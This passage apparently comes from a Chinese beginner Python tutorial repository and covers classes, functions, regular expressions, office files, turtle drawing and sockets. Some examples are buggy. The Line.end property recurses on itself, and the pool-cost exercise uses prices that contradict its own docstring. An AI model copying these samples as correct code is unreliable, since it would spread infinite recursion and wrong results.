%s = %s' % (r1, r2, r1 + r2)) print('%s - %s = %s' % (r1, r2, r1 - r2)) print('%s * %s = %s' % (r1, r2, r1 * r2)) print('%s / %s = %s' % (r1, r2, r1 / r2)) File: Day01-15/code/Day09/pet.py from abc import ABCMeta, abstractmethod class Pet(object, metaclass=ABCMeta): def __init__(self, nickname): self._nickname = nickname @abstractmethod def make_voice(self): pass class Dog(Pet): def make_voice(self): print('%s: 汪汪汪...' % self._nickname) class Cat(Pet): def make_voice(self): print('%s: 喵...喵...' % self._nickname) def main(): pets = [Dog('旺财'), Cat('凯蒂'), Dog('大黄')] for pet in pets: pet.make_voice() if __name__ == '__main__': main() File: Day01-15/code/Day09/diamond.py """ 多重继承 - 菱形继承(钻石继承) - C3算法(替代DFS的算法) Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class A(object): def foo(self): print('foo of A') class B(A): pass class C(A): def foo(self): print('foo fo C') class D(B, C): pass class E(D): def foo(self): print('foo in E') super().foo() super(B, self).foo() super(C, self).foo() if __name__ == '__main__': d = D() d.foo() e = E() e.foo() File: Day01-15/code/Day09/clock.py from time import time, localtime, sleep class Clock(object): """数字时钟""" def __init__(self, hour=0, minute=0, second=0): self._hour = hour self._minute = minute self._second = second @classmethod def now(cls): ctime = localtime(time()) return cls(ctime.tm_hour, ctime.tm_min, ctime.tm_sec) def run(self): """走字""" self._second += 1 if self._second == 60: self._second = 0 self._minute += 1 if self._minute == 60: self._minute = 0 self._hour += 1 if self._hour == 24: self._hour = 0 def show(self): """显示时间""" return '%02d:%02d:%02d' % \ (self._hour, self._minute, self._second) def main(): clock = Clock.now() while True: print(clock.show()) sleep(1) clock.run() if __name__ == '__main__': main() File: Day01-15/code/Day09/car1.py """ 属性的使用 - 访问器/修改器/删除器 - 使用__slots__对属性加以限制 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): __slots__ = ('_brand', '_max_speed') def __init__(self, brand, max_speed): self._brand = brand self._max_speed = max_speed @property def brand(self): return self._brand @brand.setter def brand(self, brand): self._brand = brand @brand.deleter def brand(self): del self._brand @property def max_speed(self): return self._max_speed @max_speed.setter def max_speed(self, max_speed): if max_speed < 0: raise ValueError('Invalid max speed for car') self._max_speed = max_speed def __str__(self): return 'Car: [品牌=%s, 最高时速=%d]' % (self._brand, self._max_speed) car = Car('QQ', 120) print(car) # ValueError # car.max_speed = -100 car.max_speed = 320 car.brand = "Benz" # 使用__slots__属性限制后下面的代码将产生异常 # car.current_speed = 80 print(car) # 如果提供了删除器可以执行下面的代码 # del car.brand # 属性的实现 print(Car.brand) print(Car.brand.fget) print(Car.brand.fset) print(Car.brand.fdel) # 通过上面的代码帮助学生理解之前提到的包装器的概念 # Python中有很多类似的语法糖后面还会出现这样的东西 File: Day01-15/code/Day09/multi.py """ 多重继承 - 通过多重继承可以给一个类的对象具备多方面的能力 - 这样在设计类的时候可以避免设计太多层次的复杂的继承关系 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Father(object): def __init__(self, name): self._name = name def gamble(self): print('%s在打麻将.' % self._name) def eat(self): print('%s在大吃大喝.' % self._name) class Monk(object): def __init__(self, name): self._name = name def eat(self): print('%s在吃斋.' % self._name) def chant(self): print('%s在念经.' % self._name) class Musician(object): def __init__(self, name): self._name = name def eat(self): print('%s在细嚼慢咽.' % self._name) def play_piano(self): print('%s在弹钢琴.' 
% self._name) # 试一试下面的代码看看有什么区别 # class Son(Monk, Father, Musician): # class Son(Musician, Father, Monk): class Son(Father, Monk, Musician): def __init__(self, name): Father.__init__(self, name) Monk.__init__(self, name) Musician.__init__(self, name) son = Son('王大锤') son.gamble() # 调用继承自Father的eat方法 son.eat() son.chant() son.play_piano() File: Day01-15/code/Day09/association.py """ 对象之间的关联关系 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import sqrt class Point(object): def __init__(self, x=0, y=0): self._x = x self._y = y def move_to(self, x, y): self._x = x self._y = y def move_by(self, dx, dy): self._x += dx self._y += dy def distance_to(self, other): dx = self._x - other._x dy = self._y - other._y return sqrt(dx ** 2 + dy ** 2) def __str__(self): return '(%s, %s)' % (str(self._x), str(self._y)) class Line(object): def __init__(self, start=Point(0, 0), end=Point(0, 0)): self._start = start self._end = end @property def start(self): return self._start @start.setter def start(self, start): self._start = start @property def end(self): return self.end @end.setter def end(self, end): self._end = end @property def length(self): return self._start.distance_to(self._end) if __name__ == '__main__': p1 = Point(3, 5) print(p1) p2 = Point(-2, -1.5) print(p2) line = Line(p1, p2) print(line.length) line.start.move_to(2, 1) line.end = Point(1, 2) print(line.length) File: Day01-15/code/Day09/dependency.py """ 对象之间的依赖关系和运算符重载 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): def __init__(self, brand, max_speed): self._brand = brand self._max_speed = max_speed self._current_speed = 0 @property def brand(self): return self._brand def accelerate(self, delta): self._current_speed += delta if self._current_speed > self._max_speed: self._current_speed = self._max_speed def brake(self): self._current_speed = 0 def __str__(self): return '%s当前时速%d' % (self._brand, self._current_speed) class Student(object): def __init__(self, name, age): self._name = name self._age = age @property def name(self): return self._name # 学生和车之间存在依赖关系 - 学生使用了汽车 def drive(self, car): print('%s驾驶着%s欢快的行驶在去西天的路上' % (self._name, car._brand)) car.accelerate(30) print(car) car.accelerate(50) print(car) car.accelerate(50) print(car) def study(self, course_name): print('%s正在学习%s.' % (self._name, course_name)) def watch_av(self): if self._age < 18: print('%s只能观看《熊出没》.' % self._name) else: print('%s正在观看岛国爱情动作片.' 
% self._name) # 重载大于(>)运算符 def __gt__(self, other): return self._age > other._age # 重载小于(<)运算符 def __lt__(self, other): return self._age < other._age if __name__ == '__main__': stu1 = Student('骆昊', 38) stu1.study('Python程序设计') stu1.watch_av() stu2 = Student('王大锤', 15) stu2.study('思想品德') stu2.watch_av() car = Car('QQ', 120) stu2.drive(car) print(stu1 > stu2) print(stu1 < stu2) File: Day01-15/code/Day09/triangle.py """ 实例方法和类方法的应用 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import sqrt class Triangle(object): def __init__(self, a, b, c): self._a = a self._b = b self._c = c # 静态方法 @staticmethod def is_valid(a, b, c): return a + b > c and b + c > a and c + a > b # 实例方法 def perimeter(self): return self._a + self._b + self._c # 实例方法 def area(self): p = self.perimeter() / 2 return sqrt(p * (p - self._a) * (p - self._b) * (p - self._c)) if __name__ == '__main__': # 用字符串的split方法将字符串拆分成一个列表 # 再通过map函数对列表中的每个字符串进行映射处理成小数 a, b, c = map(float, input('请输入三条边: ').split()) # 先判断给定长度的三条边能否构成三角形 # 如果能才创建三角形对象 if Triangle.is_valid(a, b, c): tri = Triangle(a, b, c) print('周长:', tri.perimeter()) print('面积:', tri.area()) # 如果传入对象作为方法参数也可以通过类调用实例方法 # print('周长:', Triangle.perimeter(tri)) # print('面积:', Triangle.area(tri)) # 看看下面的代码就知道其实二者本质上是一致的 # print(type(tri.perimeter)) # print(type(Triangle.perimeter)) else: print('不能构成三角形.') File: Day01-15/code/Day09/employee.py """ 抽象类 / 方法重写 / 多态 实现一个工资结算系统 公司有三种类型的员工 - 部门经理固定月薪12000元/月 - 程序员按本月工作小时数每小时100元 - 销售员1500元/月的底薪加上本月销售额5%的提成 输入员工的信息 输出每位员工的月薪信息 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from abc import ABCMeta, abstractmethod class Employee(object, metaclass=ABCMeta): def __init__(self, name): self._name = name @property def name(self): return self._name @abstractmethod def get_salary(self): pass class Manager(Employee): # 想一想: 如果不定义构造方法会怎么样 def __init__(self, name): # 想一想: 如果不调用父类构造器会怎么样 super().__init__(name) def get_salary(self): return 12000 class Programmer(Employee): def __init__(self, name): super().__init__(name) def set_working_hour(self, working_hour): self._working_hour = working_hour def get_salary(self): return 100 * self._working_hour class Salesman(Employee): def __init__(self, name): super().__init__(name) def set_sales(self, sales): self._sales = sales def get_salary(self): return 1500 + self._sales * 0.05 if __name__ == '__main__': emps = [Manager('武则天'), Programmer('狄仁杰'), Salesman('白元芳')] for emp in emps: if isinstance(emp, Programmer): working_hour = int(input('请输入%s本月工作时间: ' % emp.name)) emp.set_working_hour(working_hour) elif isinstance(emp, Salesman): sales = float(input('请输入%s本月销售额: ' % emp.name)) emp.set_sales(sales) print('%s本月月薪为: ¥%.2f元' % (emp.name, emp.get_salary())) File: Day01-15/code/Day09/car2.py """ 属性的使用 - 使用已有方法定义访问器/修改器/删除器 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): def __init__(self, brand, max_speed): self.set_brand(brand) self.set_max_speed(max_speed) def get_brand(self): return self._brand def set_brand(self, brand): self._brand = brand def get_max_speed(self): return self._max_speed def set_max_speed(self, max_speed): if max_speed < 0: raise ValueError('Invalid max speed for car') self._max_speed = max_speed def __str__(self): return 'Car: [品牌=%s, 最高时速=%d]' % (self._brand, self._max_speed) # 用已有的修改器和访问器定义属性 brand = property(get_brand, set_brand) max_speed = property(get_max_speed, set_max_speed) car = Car('QQ', 120) print(car) # ValueError # car.max_speed = -100 car.max_speed = 320 car.brand = "Benz" print(car) print(Car.brand) print(Car.brand.fget) print(Car.brand.fset) File: 
Day01-15/code/Day09/shape.py """ 继承的应用 - 抽象类 - 抽象方法 - 方法重写 - 多态 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from abc import ABCMeta, abstractmethod from math import pi class Shape(object, metaclass=ABCMeta): @abstractmethod def perimeter(self): pass @abstractmethod def area(self): pass class Circle(Shape): def __init__(self, radius): self._radius = radius def perimeter(self): return 2 * pi * self._radius def area(self): return pi * self._radius ** 2 def __str__(self): return '我是一个圆' class Rect(Shape): def __init__(self, width, height): self._width = width self._height = height def perimeter(self): return 2 * (self._width + self._height) def area(self): return self._width * self._height def __str__(self): return '我是一个矩形' if __name__ == '__main__': shapes = [Circle(5), Circle(3.2), Rect(3.2, 6.3)] for shape in shapes: print(shape) print('周长:', shape.perimeter()) print('面积:', shape.area()) File: Day01-15/code/Day08/circle.py """ 练习 修一个游泳池 半径(以米为单位)在程序运行时输入 游泳池外修一条3米宽的过道 过道的外侧修一圈围墙 已知过道的造价为25元每平米 围墙的造价为32.5元每米 输出围墙和过道的总造价分别是多少钱(精确到小数点后2位) Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ import math class Circle(object): def __init__(self, radius): self._radius = radius @property def radius(self): return self._radius @radius.setter def radius(self, radius): self._radius = radius if radius > 0 else 0 @property def perimeter(self): return 2 * math.pi * self._radius @property def area(self): return math.pi * self._radius * self._radius if __name__ == '__main__': radius = float(input('请输入游泳池的半径: ')) small = Circle(radius) big = Circle(radius + 3) print('围墙的造价为: ¥%.1f元' % (big.perimeter * 115)) print('过道的造价为: ¥%.1f元' % ((big.area - small.area) * 65)) File: Day01-15/code/Day08/guess.py """ 面向对象版本的猜数字游戏 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ from random import randint class GuessMachine(object): def __init__(self): self._answer = None self._counter = None self._hint = None def reset(self): self._answer = randint(1, 100) self._counter = 0 self._hint = None def guess(self, your_answer): self._counter += 1 if your_answer > self._answer: self._hint = '小一点' elif your_answer < self._answer: self._hint = '大一点' else: self._hint = '恭喜你猜对了' return True return False @property def counter(self): return self._counter @property def hint(self): return self._hint if __name__ == '__main__': gm = GuessMachine() play_again = True while play_again: game_over = False gm.reset() while not game_over: your_answer = int(input('请输入: ')) game_over = gm.guess(your_answer) print(gm.hint) if gm.counter > 7: print('智商余额不足!') play_again = input('再玩一次?(yes|no)') == 'yes' File: Day01-15/code/Day08/hack.py """ 另一种创建类的方式 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ def bar(self, name): self._name = name def foo(self, course_name): print('%s正在学习%s.' 
% (self._name, course_name)) def main(): Student = type('Student', (object,), dict(__init__=bar, study=foo)) stu1 = Student('骆昊') stu1.study('Python程序设计') if __name__ == '__main__': main() File: Day01-15/code/Day08/clock.py """ 定义和使用时钟类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ import time import os class Clock(object): # Python中的函数是没有重载的概念的 # 因为Python中函数的参数没有类型而且支持缺省参数和可变参数 # 用关键字参数让构造器可以传入任意多个参数来实现其他语言中的构造器重载 def __init__(self, **kw): if 'hour' in kw and 'minute' in kw and 'second' in kw: self._hour = kw['hour'] self._minute = kw['minute'] self._second = kw['second'] else: tm = time.localtime(time.time()) self._hour = tm.tm_hour self._minute = tm.tm_min self._second = tm.tm_sec def run(self): self._second += 1 if self._second == 60: self._second = 0 self._minute += 1 if self._minute == 60: self._minute = 0 self._hour += 1 if self._hour == 24: self._hour = 0 def show(self): return '%02d:%02d:%02d' % (self._hour, self._minute, self._second) if __name__ == '__main__': # clock = Clock(hour=10, minute=5, second=58) clock = Clock() while True: os.system('clear') print(clock.show()) time.sleep(1) clock.run() File: Day01-15/code/Day08/access.py class Test: def __init__(self, foo): self.__foo = foo def __bar(self): print(self.__foo) print('__bar') def main(): test = Test('hello') test._Test__bar() print(test._Test__foo) if __name__ == "__main__": main() File: Day01-15/code/Day08/rect.py """ 定义和使用矩形类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ class Rect(object): """矩形类""" def __init__(self, width=0, height=0): """初始化方法""" self.__width = width self.__height = height def perimeter(self): """计算周长""" return (self.__width + self.__height) * 2 def area(self): """计算面积""" return self.__width * self.__height def __str__(self): """矩形对象的字符串表达式""" return '矩形[%f,%f]' % (self.__width, self.__height) def __del__(self): """析构器""" print('销毁矩形对象') if __name__ == '__main__': rect1 = Rect() print(rect1) print(rect1.perimeter()) print(rect1.area()) rect2 = Rect(3.5, 4.5) print(rect2) print(rect2.perimeter()) print(rect2.area()) File: Day01-15/code/Day08/student.py """ 定义和使用学生类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ def _foo(): print('test') class Student(object): # __init__是一个特殊方法用于在创建对象时进行初始化操作 # 通过这个方法我们可以为学生对象绑定name和age两个属性 def __init__(self, name, age): self.name = name self.age = age def study(self, course_name): print('%s正在学习%s.' % (self.name, course_name)) # PEP 8要求标识符的名字用全小写多个单词用下划线连接 # 但是很多程序员和公司更倾向于使用驼峰命名法(驼峰标识) def watch_av(self): if self.age < 18: print('%s只能观看《熊出没》.' % self.name) else: print('%s正在观看岛国大电影.' 
% self.name) def main(): stu1 = Student('骆昊', 38) stu1.study('Python程序设计') stu1.watch_av() stu2 = Student('王大锤', 15) stu2.study('思想品德') stu2.watch_av() if __name__ == '__main__': main() File: Day01-15/code/Day06/function6.py """ 作用域问题 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 局部作用域 def foo1(): a = 5 foo1() # print(a) # NameError # 全局作用域 b = 10 def foo2(): print(b) foo2() def foo3(): b = 100 # 局部变量 print(b) foo3() print(b) def foo4(): global b b = 200 # 全局变量 print(b) foo4() print(b) File: Day01-15/code/Day06/function2.py """ 函数的定义和使用 - 求最大公约数和最小公倍数 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ def gcd(x, y): if x > y: (x, y) = (y, x) for factor in range(x, 1, -1): if x % factor == 0 and y % factor == 0: return factor return 1 def lcm(x, y): return x * y // gcd(x, y) print(gcd(15, 27)) print(lcm(15, 27)) File: Day01-15/code/Day06/function3.py """ Python的内置函数 - 数学相关: abs / divmod / pow / round / min / max / sum - 序列相关: len / range / next / filter / map / sorted / slice / reversed - 类型转换: chr / ord / str / bool / int / float / complex / bin / oct / hex - 数据结构: dict / list / set / tuple - 其他函数: all / any / id / input / open / print / type Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ def myfilter(mystr): return len(mystr) == 6 # help() print(chr(0x9a86)) print(hex(ord('骆'))) print(abs(-1.2345)) print(round(-1.2345)) print(pow(1.2345, 5)) fruits = ['orange', 'peach', 'durian', 'watermelon'] print(fruits[slice(1, 3)]) fruits2 = list(filter(myfilter, fruits)) print(fruits) print(fruits2) File: Day01-15/code/Day06/function4.py """ Python常用模块 - 运行时服务相关模块: copy / pickle / sys / ... - 数学相关模块: decimal / math / random / ... - 字符串处理模块: codecs / re / ... - 文件处理相关模块: shutil / gzip / ... - 操作系统服务相关模块: datetime / os / time / logging / io / ... - 进程和线程相关模块: multiprocessing / threading / queue - 网络应用相关模块: ftplib / http / smtplib / urllib / ... - Web编程相关模块: cgi / webbrowser - 数据处理和编码模块: base64 / csv / html.parser / json / xml / ... Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ import time import shutil import os seconds = time.time() print(seconds) localtime = time.localtime(seconds) print(localtime) print(localtime.tm_year) print(localtime.tm_mon) print(localtime.tm_mday) asctime = time.asctime(localtime) print(asctime) strtime = time.strftime('%Y-%m-%d %H:%M:%S', localtime) print(strtime) mydate = time.strptime('2018-1-1', '%Y-%m-%d') print(mydate) shutil.copy('/Users/Hao/hello.py', '/Users/Hao/Desktop/first.py') os.system('ls -l') os.chdir('/Users/Hao') os.system('ls -l') os.mkdir('test') File: Day01-15/code/Day06/function5.py """ 函数的参数 - 位置参数 - 可变参数 - 关键字参数 - 命名关键字参数 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 参数默认值 def f1(a, b=5, c=10): return a + b * 2 + c * 3 print(f1(1, 2, 3)) print(f1(100, 200)) print(f1(100)) print(f1(c=2, b=3, a=1)) # 可变参数 def f2(*args): sum = 0 for num in args: sum += num return sum print(f2(1, 2, 3)) print(f2(1, 2, 3, 4, 5)) print(f2()) # 关键字参数 def f3(**kw): if 'name' in kw: print('欢迎你%s!' % kw['name']) elif 'tel' in kw: print('你的联系电话是: %s!' % kw['tel']) else: print('没找到你的个人信息!') param = {'name': '骆昊', 'age': 38} f3(**param) f3(name='骆昊', age=38, tel='13866778899') f3(user='骆昊', age=38, tel='13866778899') f3(user='骆昊', age=38, mobile='13866778899') File: Day01-15/code/Day06/function1.py """ 函数的定义和使用 - 计算组合数C(7,3) Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 将求阶乘的功能封装成一个函数 def factorial(n): result = 1 for num in range(1, n + 1): result *= num return result print(factorial(7) // factorial(3) // factorial(4)) File: Day01-15/code/Day01/hello.py """ 第一个Python程序 - hello, world! 
向伟大的Dennis M. Ritchie先生致敬 Version: 0.1 Author: 骆昊 Date: 2018-02-26 请将该文件命名为hello.py 使用Windows的小伙伴可以在命令行提示下通过下面的命令运行该程序 python hello.py 对于使用Linux或macOS的小伙伴可以打开终端并键入下面的命令来运行程序 python3 hello.py """ print('hello, world!') # print("你好,世界!") print('你好', '世界') print('hello', 'world', sep=', ', end='!') print('goodbye, world', end='!\n') File: Day01-15/code/Day01/flag.py """ 用Python的turtle模块绘制国旗 """ import turtle def draw_rectangle(x, y, width, height): """绘制矩形""" turtle.goto(x, y) turtle.pencolor('red') turtle.fillcolor('red') turtle.begin_fill() for i in range(2): turtle.forward(width) turtle.left(90) turtle.forward(height) turtle.left(90) turtle.end_fill() def draw_star(x, y, radius): """绘制五角星""" turtle.setpos(x, y) pos1 = turtle.pos() turtle.circle(-radius, 72) pos2 = turtle.pos() turtle.circle(-radius, 72) pos3 = turtle.pos() turtle.circle(-radius, 72) pos4 = turtle.pos() turtle.circle(-radius, 72) pos5 = turtle.pos() turtle.color('yellow', 'yellow') turtle.begin_fill() turtle.goto(pos3) turtle.goto(pos1) turtle.goto(pos4) turtle.goto(pos2) turtle.goto(pos5) turtle.end_fill() def main(): """主程序""" turtle.speed(12) turtle.penup() x, y = -270, -180 # 画国旗主体 width, height = 540, 360 draw_rectangle(x, y, width, height) # 画大星星 pice = 22 center_x, center_y = x + 5 * pice, y + height - pice * 5 turtle.goto(center_x, center_y) turtle.left(90) turtle.forward(pice * 3) turtle.right(90) draw_star(turtle.xcor(), turtle.ycor(), pice * 3) x_poses, y_poses = [10, 12, 12, 10], [2, 4, 7, 9] # 画小星星 for x_pos, y_pos in zip(x_poses, y_poses): turtle.goto(x + x_pos * pice, y + height - y_pos * pice) turtle.left(turtle.towards(center_x, center_y) - turtle.heading()) turtle.forward(pice) turtle.right(90) draw_star(turtle.xcor(), turtle.ycor(), pice) # 隐藏海龟 turtle.ht() # 显示绘图窗口 turtle.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day01/peppa_pig.py """ 绘制小猪佩奇 """ from turtle import * def nose(x,y): """画鼻子""" penup() # 将海龟移动到指定的坐标 goto(x,y) pendown() # 设置海龟的方向(0-东、90-北、180-西、270-南) setheading(-30) begin_fill() a = 0.4 for i in range(120): if 0 <= i < 30 or 60 <= i <90: a = a + 0.08 # 向左转3度 left(3) # 向前走 forward(a) else: a = a - 0.08 left(3) forward(a) end_fill() penup() setheading(90) forward(25) setheading(0) forward(10) pendown() # 设置画笔的颜色(红, 绿, 蓝) pencolor(255, 155, 192) setheading(10) begin_fill() circle(5) color(160, 82, 45) end_fill() penup() setheading(0) forward(20) pendown() pencolor(255, 155, 192) setheading(10) begin_fill() circle(5) color(160, 82, 45) end_fill() def head(x, y): """画头""" color((255, 155, 192), "pink") penup() goto(x,y) setheading(0) pendown() begin_fill() setheading(180) circle(300, -30) circle(100, -60) circle(80, -100) circle(150, -20) circle(60, -95) setheading(161) circle(-300, 15) penup() goto(-100, 100) pendown() setheading(-30) a = 0.4 for i in range(60): if 0<= i < 30 or 60 <= i < 90: a = a + 0.08 lt(3) #向左转3度 fd(a) #向前走a的步长 else: a = a - 0.08 lt(3) fd(a) end_fill() def ears(x,y): """画耳朵""" color((255, 155, 192), "pink") penup() goto(x, y) pendown() begin_fill() setheading(100) circle(-50, 50) circle(-10, 120) circle(-50, 54) end_fill() penup() setheading(90) forward(-12) setheading(0) forward(30) pendown() begin_fill() setheading(100) circle(-50, 50) circle(-10, 120) circle(-50, 56) end_fill() def eyes(x,y): """画眼睛""" color((255, 155, 192), "white") penup() setheading(90) forward(-20) setheading(0) forward(-95) pendown() begin_fill() circle(15) end_fill() color("black") penup() setheading(90) forward(12) setheading(0) forward(-3) pendown() begin_fill() circle(3) 
end_fill() color((255, 155, 192), "white") penup() seth(90) forward(-25) seth(0) forward(40) pendown() begin_fill() circle(15) end_fill() color("black") penup() setheading(90) forward(12) setheading(0) forward(-3) pendown() begin_fill() circle(3) end_fill() def cheek(x,y): """画脸颊""" color((255, 155, 192)) penup() goto(x,y) pendown() setheading(0) begin_fill() circle(30) end_fill() def mouth(x,y): """画嘴巴""" color(239, 69, 19) penup() goto(x, y) pendown() setheading(-80) circle(30, 40) circle(40, 80) def setting(): """设置参数""" pensize(4) # 隐藏海龟 hideturtle() colormode(255) color((255, 155, 192), "pink") setup(840, 500) speed(10) def main(): """主函数""" setting() nose(-100, 100) head(-69, 167) ears(0, 160) eyes(0, 140) cheek(80, 10) mouth(-20, 30) done() if __name__ == '__main__': main() File: Day01-15/code/Day12/str2.py """ 字符串常用操作 - 实现字符串倒转的方法 Version: 0.1 Author: 骆昊 Date: 2018-03-19 """ from io import StringIO def reverse_str1(str): return str[::-1] def reverse_str2(str): if len(str) <= 1: return str return reverse_str2(str[1:]) + str[0:1] def reverse_str3(str): # StringIO对象是Python中的可变字符串 # 不应该使用不变字符串做字符串连接操作 因为会产生很多无用字符串对象 rstr = StringIO() str_len = len(str) for index in range(str_len - 1, -1, -1): rstr.write(str[index]) return rstr.getvalue() def reverse_str4(str): return ''.join(str[index] for index in range(len(str) - 1, -1, -1)) def reverse_str5(str): # 将字符串处理成列表 str_list = list(str) str_len = len(str) # 使用zip函数将两个序列合并成一个产生元组的迭代器 # 每次正好可以取到一前一后两个下标来实现元素的交换 for i, j in zip(range(str_len // 2), range(str_len - 1, str_len // 2, -1)): str_list[i], str_list[j] = str_list[j], str_list[i] # 将列表元素连接成字符串 return ''.join(str_list) if __name__ == '__main__': str = 'I love Python' print(reverse_str1(str)) print(str) print(reverse_str2(str)) print(str) print(reverse_str3(str)) print(str) print(reverse_str4(str)) print(str) print(reverse_str5(str)) print(str) File: Day01-15/code/Day12/test4.py import re def main(): # 创建正则表达式对象 使用了前瞻和回顾来保证手机号前后不应该出现数字 pattern = re.compile(r'(?<=\D)(1[38]\d{9}|14[57]\d{8}|15[0-35-9]\d{8}|17[678]\d{8})(?=\D)') sentence = ''' 重要的事情说8130123456789遍,我的手机号是13512346789这个靓号, 不是15600998765,也是110或119,王大锤的手机号才是15600998765。 ''' # 查找所有匹配并保存到一个列表中 mylist = re.findall(pattern, sentence) print(mylist) print('--------华丽的分隔线--------') # 通过迭代器取出匹配对象并获得匹配的内容 for temp in pattern.finditer(sentence): print(temp.group()) print('--------华丽的分隔线--------') # 通过search函数指定搜索位置找出所有匹配 m = pattern.search(sentence) while m: print(m.group()) m = pattern.search(sentence, m.end()) if __name__ == '__main__': main() File: Day01-15/code/Day12/test5.py """ 不良内容过滤 """ import re def main(): sentence = '你丫是傻叉吗? 我操你大爷的. Fuck you.' 
purified = re.sub('[操肏艹]|fuck|shit|傻[比屄逼叉缺吊屌]|煞笔', '*', sentence, flags=re.IGNORECASE) print(purified) if __name__ == '__main__': main() File: Day01-15/code/Day12/test3.py """ 验证输入用户名和QQ号是否有效并给出对应的提示信息 要求: 用户名必须由字母、数字或下划线构成且长度在6~20个字符之间 QQ号是5~12的数字且首位不能为0 """ import re def main(): username = input('请输入用户名: ') qq = input('请输入QQ号: ') m1 = re.match(r'^[0-9a-zA-Z_]{6,20}$', username) if not m1: print('请输入有效的用户名.') m2 = re.match(r'^[1-9]\d{4,11}$', qq) if not m2: print('请输入有效的QQ号.') if m1 and m2: print('你输入的信息是有效的!') if __name__ == '__main__': main() File: Day01-15/code/Day12/str1.py """ 字符串常用操作 Version: 0.1 Author: 骆昊 Date: 2018-03-19 """ import pyperclip # 转义字符 print('My brother\'s name is \'007\'') # 原始字符串 print(r'My brother\'s name is \'007\'') str = 'hello123world' print('he' in str) print('her' in str) # 字符串是否只包含字母 print(str.isalpha()) # 字符串是否只包含字母和数字 print(str.isalnum()) # 字符串是否只包含数字 print(str.isdecimal()) print(str[0:5].isalpha()) print(str[5:8].isdecimal()) list = ['床前明月光', '疑是地上霜', '举头望明月', '低头思故乡'] print('-'.join(list)) sentence = 'You go your way I will go mine' words_list = sentence.split() print(words_list) email = ' [email protected] ' print(email) print(email.strip()) print(email.lstrip()) # 将文本放入系统剪切板中 pyperclip.copy('老虎不发猫你当我病危呀') # 从系统剪切板获得文本 # print(pyperclip.paste()) File: Day01-15/code/Day15/word1.py """ 创建Word文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ File: Day01-15/code/Day15/pdf1.py """ 创建PDF文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ File: Day01-15/code/Day15/excel1.py """ 创建Excel文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from openpyxl import Workbook from openpyxl.worksheet.table import Table, TableStyleInfo workbook = Workbook() sheet = workbook.active data = [ [1001, '白元芳', '男', '13123456789'], [1002, '白洁', '女', '13233445566'] ] sheet.append(['学号', '姓名', '性别', '电话']) for row in data: sheet.append(row) tab = Table(displayName="Table1", ref="A1:E5") tab.tableStyleInfo = TableStyleInfo( name="TableStyleMedium9", showFirstColumn=False, showLastColumn=False, showRowStripes=True, showColumnStripes=True) sheet.add_table(tab) workbook.save('./res/全班学生数据.xlsx') File: Day01-15/code/Day15/excel2.py """ 读取Excel文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from openpyxl import load_workbook from openpyxl import Workbook workbook = load_workbook('./res/学生明细表.xlsx') print(workbook.sheetnames) sheet = workbook[workbook.sheetnames[0]] print(sheet.title) for row in range(2, 7): for col in range(65, 70): cell_index = chr(col) + str(row) print(sheet[cell_index].value, end='\t') print() File: Day01-15/code/Day15/pdf2.py """ 读取PDF文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from PyPDF2 import PdfFileReader with open('./res/Python课程大纲.pdf', 'rb') as f: reader = PdfFileReader(f, strict=False) print(reader.numPages) if reader.isEncrypted: reader.decrypt('') current_page = reader.getPage(5) print(current_page) print(current_page.extractText()) File: Day01-15/code/Day15/pillow1.py """ 使用pillow操作图像 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from PIL import Image img = Image.open('./res/guido.jpg') print(img.size) print(img.format) print(img.format_description) img.save('./res/guido.png') img2 = Image.open('./res/guido.png') img3 = img2.crop((335, 435, 430, 615)) for x in range(4): for y in range(5): img2.paste(img3, (95 * y , 180 * x)) img2.resize((img.size[0] // 2, img.size[1] // 2)) img2.rotate(90) img2.save('./res/guido2.png') File: Day01-15/code/Day15/word2.py """ 读取Word文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from docx import Document doc = 
Document('./res/用函数还是用复杂的表达式.docx') print(len(doc.paragraphs)) print(doc.paragraphs[0].text) # print(doc.paragraphs[1].runs[0].text) content = [] for para in doc.paragraphs: content.append(para.text) print(''.join(content)) File: Day01-15/code/Day14/fileclient.py from socket import socket from json import loads from base64 import b64decode def main(): client = socket() client.connect(('192.168.1.2', 5566)) # 定义一个保存二进制数据的对象 in_data = bytes() # 由于不知道服务器发送的数据有多大每次接收1024字节 data = client.recv(1024) while data: # 将收到的数据拼接起来 in_data += data data = client.recv(1024) # 将收到的二进制数据解码成JSON字符串并转换成字典 # loads函数的作用就是将JSON字符串转成字典对象 my_dict = loads(in_data.decode('utf-8')) filename = my_dict['filename'] filedata = my_dict['filedata'].encode('utf-8') with open('/Users/Hao/' + filename, 'wb') as f: # 将base64格式的数据解码成二进制数据并写入文件 f.write(b64decode(filedata)) print('图片已保存.') if __name__ == '__main__': main() File: Day01-15/code/Day14/chatserver.py from socket import socket from threading import Thread def main(): class ClientHandler(Thread): def __init__(self, client): super().__init__() self._client = client def run(self): try: while True: try: data = self._client.recv(1024) if data.decode('utf-8') == 'byebye': clients.remove(self._client) self._client.close() break else: for client in clients: client.send(data) except Exception as e: print(e) clients.remove(self._client) break except 